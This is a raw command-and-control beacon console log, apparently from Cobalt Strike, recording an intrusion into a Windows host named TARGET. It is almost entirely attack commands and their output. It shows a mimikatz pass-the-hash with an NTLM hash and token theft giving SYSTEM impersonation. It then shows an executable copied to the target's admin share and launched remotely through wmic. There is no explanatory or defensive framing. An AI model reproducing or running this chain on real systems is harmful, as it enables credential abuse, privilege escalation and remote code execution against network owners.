beacon> shell dir \\TARGET\c$
[*] Tasked beacon to run: dir \\TARGET\c$
[+] host called home, sent: 52 bytes
[+] received output:
 Volume in drive \\TARGET\c$ has no label.
 Volume Serial Number is 00EE-EB32

beacon> shell mimi.exe "sekurlsa::pth /user:test /domain:TEST.COM /ntlm:4ff977a6aexxxxxxxxx5eb286af790b"
[*] Tasked beacon to run: mimi.exe "sekurlsa::pth /user:test /domain:TEST.COM /ntlm:4ff977a6aexxxxxxxxx5eb286af790b"
[+] host called home, sent: 123 bytes
[+] received output:

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # sekurlsa::pth /user:test /domain:TEST.COM /ntlm:4ff977a6aexxxxxxxxx5eb286af790b
user    : test
domain  : TEST.COM
program : cmd.exe
impers. : no
NTLM    : 4ff977a6aexxxxxxxxx5eb286af790b
  |  PID  8572
  |  TID  17812
  |  LSA Process is now R/W
  |  LUID 1 ; 1401080865 (00000001:5382cc21)
  \_ msv1_0   - data copy @ 000001D56F74E560 : OK !
  \_ kerberos - data copy @ 000001D5716E0BD8
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 000001D5725F1A18 (32) -> null

mimikatz #

beacon> steal_token 8572
[*] Tasked beacon to steal token from PID 8572
[+] host called home, sent: 12 bytes
[+] Impersonated NT AUTHORITY\SYSTEM

beacon> shell dir \\TARGET\c$
[*] Tasked beacon to run: dir \\TARGET\c$
[+] host called home, sent: 52 bytes
[+] received output:
 Volume in drive \\TARGET\c$ has no label.
 Volume Serial Number is 00EE-EB32

beacon> shell copy 91695d7b-04b0-406f-a5c6-a6d1a7b939fc.exe \\TARGET\C$\windows
[*] Tasked beacon to run: copy 91695d7b-04b0-406f-a5c6-a6d1a7b939fc.exe \\TARGET\C$\windows
[+] host called home, sent: 102 bytes
[+] received output:
        1 file(s) copied.

beacon> shell wmic /node:TARGET process call create "c:\windows\91695d7b-04b0-406f-a5c6-a6d1a7b939fc.exe"
[*] Tasked beacon to run: wmic /node:TARGET process call create "c:\windows\91695d7b-04b0-406f-a5c6-a6d1a7b939fc.exe"
[+] host called home, sent: 128 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 7372;
        ReturnValue = 0;
};